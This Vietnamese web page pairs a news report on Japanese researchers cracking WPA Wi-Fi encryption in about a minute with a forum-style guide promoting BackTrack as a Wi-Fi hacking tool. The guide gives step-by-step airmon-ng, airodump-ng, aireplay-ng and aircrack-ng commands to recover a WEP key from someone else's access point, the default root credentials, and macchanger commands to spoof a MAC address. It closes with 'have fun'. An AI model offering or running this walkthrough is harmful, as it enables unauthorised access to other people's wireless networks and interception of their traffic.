Hai nhà khoa học máy tính đến từ trường đại học Toshihiro Ohigashi và Masakatu Morii (Nhật Bản) cho biết, họ có thể bẻ khóa hệ thống mã hóa bảo vệ để truy cập trái phép vào mạng Wi-fi (WPA) trong các bộ định tuyến không dây, và qua trình này chỉ mất có 1 phút.
Thông qua cách làm này, kẻ tấn công có thể đọc lưu lượng được mã hóa gửi đi giữa các máy tính và các bộ định tuyến (router) sử dụng hệ thống mã hóa WPA (truy cập Wi-Fi được bảo vệ). Hai nhà khoa học dự kiến sẽ thảo luận chi tiết hơn về cách thức bẻ khóa này tại hội thảo công nghệ diễn ra vào ngày 25/9 tới tại Hiroshima.
Tháng 11 năm ngoái, các nhà nghiên cứu bảo mật đã trình diễn cách thức bẻ khóa WPA và phải mất từ 12-15 phút. Khi đó, kỹ thuật bẻ khóa được thực hiện trên các hệ thống WPA sử dụng thuật toán Temporal Key Integrity Protocol (TKIP) và không thể áp dụng đối với các thiết bị WPA 2 mới hơn hoặc sử dụng thuật toán mã hóa Advanced Encryption Standard (AES) cấp cao hơn. Còn lần này, các nhà nghiên cứu Nhật Bản đưa ra cách bẻ khóa ở mức mới cao hơn, phạm vi rộng hơn và chỉ mất có 60 giây.
Các bộ định tuyến sử dụng hệ thống bảo mật đã gặp nhiều vấn đề bảo mật trong thời gian qua như hệ thống Wired Equivalent Privacy (WEP) được giới thiệu năm 1997 và bị bẻ khóa chỉ vài năm sau đó. Do đó, lần bẻ khóa này của các chuyên gia bảo mật Nhật Bản đã một lần nữa đánh lên hồi chuông cảnh báo độ bảo mật trên các bộ định tuyến Wi-Fi.
Theo VnMedia (PC World)
"BACKTRACK" CÔNG CỤ HACK WIFI HÀNG ĐẦU THẾ GIỚI
DÙNG CHO MỌI HỆ ĐIỀU HÀNH
Bước 1 downnload BACKTRACK 4 beta
KHI DOWN FILE ISO VỀ BURN RA ĐĨA VÀ BOOT --> MÌNH DÙNG LIVE CD
http://www.remote-exploit.org/backtrack_download.htmlBước 2 download tài liệu về --> dành cho những bạn thích hiểi rõ về cấu trúc của nó
http://www.scribd.com/doc/3816372/ha...bang-backtractdowload tai:
http://www.mediafire.com/?sharekey=9feb27a6653605bab94117dade8fc295e04e75f6e8ebb871LƯU Ý KHI DÙNG BACKTRACT THEO TÀI LIỆU
1.BT 4 beta
2.để tự động boot không chỉnh bất cứ dòng nào
3.login:root
4.pass:toor
5.mở bảng conshole:có 1 ô màu đen bé xíu kế bên startmenu
CÁC BẠN LÀM THEO DÒNG LỆNH SAU
1.iwconfig-->xem tên card mình đang dùng
mình dùng card interface là wlan0 nên---> nên xem tài liêu ở trên để hiễu rõ hơn
2.airmon-ng
3.airmon-ng stop wlan0
4.airmon-ng start wlan0
5.airodump-ng --ivs --write capturefile wlan0
6.airodump-ng --ivs --channel {ap channel} --bssid {ap bssid} --write capturefile wlan0
7.aireplay-ng --arpreplay -b {ap bssid} -h {client MAC from airodump} wlan0
8.aircrack-ng -b {ap bssid}
thế là đã có wep key -->mình khuyên các bạn nên đọc tài liệu trên để hiể hơn (100% thành công)
Lượng DATA tối thiểu nên chờ là 40 000 nha các bạn
CHANGE mac NẾU CẦN THIẾT
change mac) thực hiện theo các lệnh sau
Code:
-(...) tên interface như WLAN0 chẳng hạn
airmon-ng
airmon-ng stop ...
iconfig ... down
macchanger --mac 00:11:22:33:44:55 ...
airmon-ng start ...
và khi đã monitor , thì bạn tiếp tục thưc hiện các lệnh kế , và bây giờ bạn ko cần quan tâm station cũa người ta (khi đến lệnh nào mầ phải điền station thì bạn điền 00:11 ..etc
have fun